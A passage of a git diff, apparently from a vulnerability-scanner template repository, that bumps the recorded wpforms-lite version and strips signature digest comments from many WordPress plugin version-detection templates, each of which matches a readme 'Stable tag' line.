a/helpers/wordpress/plugins/wpforms-lite.txt b/helpers/wordpress/plugins/wpforms-lite.txt index b262ed2849..a95dd7ef69 100644 --- a/helpers/wordpress/plugins/wpforms-lite.txt +++ b/helpers/wordpress/plugins/wpforms-lite.txt @@ -1 +1 @@ -1.8.9.4 \ No newline at end of file +1.8.9.5 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index a2b8cef9b5..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022018ba62114b4c2c177a0631178330bf8ca8453964e627ad2583a2e231a130a6c5022100e8d46ee9e0c4573a362fbf9578d61f96fa22f9b87fa6939b9c7b68c76cbbfcb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index c51d3ae7eb..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220262eb01014678068fb110435ed2fd3f9ae6dec513700c9e395c35d938243606702206dc7652aaa793d30fe1a594d1e1628766ff7a80762ff6aa64f4026470fe7bdff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 85dee1ef89..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c801dc88d30e2ae197eb846215609bd0dbb329228b88a8a108a73c4066e86bcd022100ffd7a10ecfb3fc82af5e37ad6909246679d04de14bc3bccaa39ed1c9788214c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index b935c1e1af..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c13575d7808f6e69e911c9bf63f68e7b8ae78400170ad5bce79714c53b22be41022100834a1f5f490e6f7c0b216b971f37681b0ad9f03625bf31228e10775522add8ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 4b7a69b0cb..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d68617be7743c4a8796da57b24f8ed6c46aa7612974866e01f2edcc4db3d3e80022005d38f088cb6a3eeece6584d8e164582290a00bcba27a2623d17732b271f255d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 28038c4c2e..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e7e8142af7f0933256b4ce0b1ab03f320071cd962e51847136d3e41a9275b1020221009944f8f9ac8f50e3f38adbcb7ea466d675b3d0d0dd445d68849177b7ac085ad5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 4d47934a5a..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008ac0f6c595e838c483b91b98c75b19e7d3567306e48c0d8c4948b5e35499894602210092a4363ed10efeba87bb0ef404f33eed89ea2cfad41ff14425f0e8e8f96aa55c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index ab67a36d95..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f6487588bc1195517c716094a88be0db680acf3c826a3fc20090f504a27f0f2a02205c365cb7069749a7f8706a5192a8974c798e5316d65b4cff43b6ee666cdc1def:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 932c2d6377..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022059dc0fc25df973feab2212b627371d738c441a3b4e4c30a790bf8b20fdd9b99e02202d73de2f2bb5b7a547c5d3263e09dcc155e5c61ed42c025067c14ee643a1e020:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 3248a1bf2c..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e2a76b4508cb9d6ccee21fdd6142d3c2cadf8c6a21536d4f747f78fe86f90f3a022100f3bc5b3e0292fe528a49f627953078af95931ee2a89acaa0502fcbd3220f8e99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 38a6477079..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022071c319cc170f18c8eebf281eb152e950f1b33d8edcf805e394dd8d983b9e27e2022061bf2ae70b06874ff8d7facf79183a29b5326c8486171f4ae95f90cc80cb5a0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index faf5277205..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b01017837c9708170c6c7f660ad51f634d65da03d2b2ac91fa7101438be5875202200a7d9c216bc10a2bc24b394f97ba3364f03e71f4ee3aea00c88269e355f8500a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 54410a6843..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009c1a4688b5cb0493ba0e23562c8b88a4960f20256862ca60324a6388bd65bbba022100cd0181c624ea3e37e7f5e4234f205db1814bbe5b980d101ef03053719cf1626a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 2c2a214dd7..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017518a6e71bacbaf11139f8622f1936bcc91f90c3e4ccd4f2a27843b0661e5a30221008d1d5be89cc3ca6ba808afefc804a8191c94377215a6b9afa17a6c40b144fd86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index b03fb6a0b8..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220689808feba7d6b158978163b09ec8b10a528a65387e6dfab2f213bda0e24460102201708ef9288ea4a4abaecc40da28f420208801dbeec89446b6bfc0dd09a14d152:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 8bed2f2887..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a29472492f0b0232cc3deff5ba68a8d9e6a69d40475962ef16189a0012c62fe7022100a57c98a89e5f115e69185746072e490cb79856cefe042b40feeb623ffa275f61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 14a2b4adbb..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100adf5588ef50fc3268520efcbcec8cc9773847e4ce3769c2fa209e8443b21e75e022100c506c836286afa9f1a052142eaf3141266f7b285769b944b8cd3e51ef39ad7f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index db3cb25444..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207cc8fcaf7de198d69c86bdacb7f8a0e647b174d50d2503b6391190efbeaefa57022100b6e9f291e27360e5a911745b2dc375c92bbc0b667839259acc9ec2fd895e7292:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 31eb0433c5..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f63b215992d88fb54e8ac3275cfbe185b2cf9893e16a1c0c7e24ab2d792ab615022072e15dfab48e9fabbf9d5240d4bbdbedd23f0f0d54731f838b1603d72330221e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 7453faa220..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b3334432e585b0307de6e7101ec22db027ad5219ae66c041be1a0dff475967b8022100800083fb1491874d3b935d379513bf2e8b77e4fe5e33ceb35c940bc6ac0295e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index a31a497911..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009fa700cff764ab4d300d9ba03770ba3896642b3870c230cb1e4b6709890407e0022100aac82e57ad735be9720ff6d82c549543a198de748a806d6e14a4e44912b5782e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 5399ae986c..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009d747c2b1147cb6f28ad726d69ea7b63862ad7700d6daec400724ad0a2a2116d02206038320ed731efe0b9de3af96f4988ebef77a6733c9d4c0435275d997c752a1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 1593861fe5..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aa33a9cebd414f168d4b268ee7e577aa2b693b64f25d4cd05d46609894d347c8022100c25c19c0c21b75b0ccfd634a9db82177ff7bc285781024fa84bf05086d1f1910:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 6e0d9dc4a2..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022024cbc2e0e9e7a3a57103dd314363652a026571bd6a4e9c4a8c87f11ee0527884022100afcaf294326a678318988c8e43805e4c898bdf3d7ce9e219acd2e57ab56b48ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 0cf497e95e..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008a7cbd2def1ef208ac84395aecf9d0dfd23a8f3cacc0d8070e5d1b060529919402206d189f2d0a83fa5ec6642f703f00f0e9b0cb2463d0e3f09a904239c99315f94d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 755e0b3d78..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100da84c1dff7c6980febf8f347ea56fbc9cf715c18e8f9626390a12f28e0a73def022100f5dd487a8e4220213eb099a4af671a90780538e6bc043d58762b1fd87aeb2600:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 3b45bb8c3c..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008c695afd63fb46e88b99ba698e26b2fc8a95af529d7fcf1000d7c0d80a1353f30220763825c9fe9f345935016dbf38d7b1067bf611e67abd8ca596dfedf5d7d07a2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 59ebd51838..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220406de4ff1d015ca8a1b5ee851024c7c8b299b99182d461afd9b4e0a93af59384022100a1644a5dd54ad8bb3337621f05b469411a4e8a808bd9f321fa134ca6cae33e49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index ee231e7191..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008a9fabd5aae6eef0f13f679bbd07eca4a427979f99f4bab4333e7878006c1d02022100f4826a1bf53ec6dfeca5fa71813625d7eda0e9ce3a93a442b34c122c4a2db04b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index c4bb7aed20..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207ddd90bf5c6ff60e6e1bbd4b693d7f678b21bea34ead3ecfdff1f4f60029c071022078030d949efc79e8502826407625aebaac6d5fd54c8c6ca18ed40f2075ce29d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cca9ad52e9..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220196392bdb0ef9d369a3105bb1eda3d843031f7fd86c852a6f5a30344f88d06e3022021533a6256ba2cec27aef5520957251745edc047efaf1bb58cc493fa708e10bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 4192c70950..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cc1e7bd79144601b3bb47c0779603c67e72b29287b45d72e4a3c5520f0aee9e4022100cef66700939934ed6afb77fd0cae5ece4d4e0571ed3e7f7eb7454b0e530cf83b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 35ddfd2f6f..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100902f9be57fd3fb096876ca9f3027441a1e6ffdc9cfcf58750a4c8790f9f6fd39022100cbe49cc30f8fd3647ed60f0bacca7cfc47e42c098d1beb4b88c4828d15f8e21f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 7bd2e5e212..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022074a68fe0cb034bf245ece47ec41d7d573aebb7b91be21afbb16b3485fa84071002202020cda867e6281255ef6f9af3d442e16f770ca9d3ddfa4dbf44e6a6f5b82f7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 21e7b1977b..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207bdfccf43e33c22cb3d2c71d43cbf59ed8fb0080baec463c8f8dabc9136e435b02201a303bbfa11cd95b477de26f976cd3007480c360ad207c2361feead73fe2a43c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index f430ef9829..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220037a379e0cdff738fc77b876ffe9b43bbb0b42cd74548854b4cba6753b8d2e2c02200af8f634bcf26bbd93092b6a957ad73badbe56018dcd2c675147779c07c150b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 9a63af7f38..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b22531c70f11d49f73d7d0d0a254934415786ca8109cce95cc4b6d856d9cf73a0220051ba3bcfdde5832bf32ca7dc5f9a9051f1b65a0d70977cbcce994faef1e9f0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 993c3d90b2..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220601ed53157a0bb7c55b086cb15eb9cff3c4ca65570996f96c97093cbaa72bc30022100f1d151b2e5bc90457dae4c29e2ed40f3822c504419c7cb6d7a08a4b925d70ecf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 76c1da8c33..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e43892fc9f5fee54742195009c730e4a9f8cafa58308d770cbd3349ec0d3ffe2022054a04fadb15931bbf08d5b55e8cf9a3c4447d0bbad61d65d1fa476370dc5c5c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index c8e2a01a24..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220009f0ee651cab915097af1e0cbf8e8373b55bc9f296ce98ad1da39be170a3ad6022066bfd1df4f6a30ca30a08dbf5447703027e0ab2a00f522e0cb64c0c04f2333fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 2af31f83c5..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fbb088666678905d5bb618021cc84ff2e8b79f88bf4233d40fdc614a53b86add022100e3b170e69aa7cd80a1003a3a058adb096e60e75dc6b5a593f33b817843a9c5c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index bdcbc1122c..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207ea2b37e575863f7a5f76abec60cb87c181e36563ea63582cbb49e4f8f8e539c022100c7514655de0b97c092c6d4104b72e6dfeea9efca68071c061c51d87870caf1fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 5c535d04e7..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203aed68bbcdea42936ea5cc557decb875d5d034365cea9df058ceab387b7fff98022100fd41e8601e1aa1a44b120a0755755b924450999d900346e65e77e93239609c31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index bf9a819f14..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eea3a55b3c46c691910c5d72b737fbe3690fd79c0dabf3c2ae54b027010d4bc802206d4c03943032ece634262f7906092e0a3461dcb500f27d90966a1abcbfb0c9de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 4ee2ed4d18..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022023f9a2b31b88617a8aeeb07e505c7d74a433c2cfa922bd45900085187dd29b2f0220158070a18dc485e470e115f5ea95952057010b362c7e2f49c6852b4a5da5a3f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b4cb84e09e..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022045972cb2d7a1ef325b79dbd929d188d0b67037246d621e7d6337cf318ad4cfc40220027be7df08fa987614a62f56a882af2a5a2dd9da1d8d456c3611b312ed726416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 78ea0ee534..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ 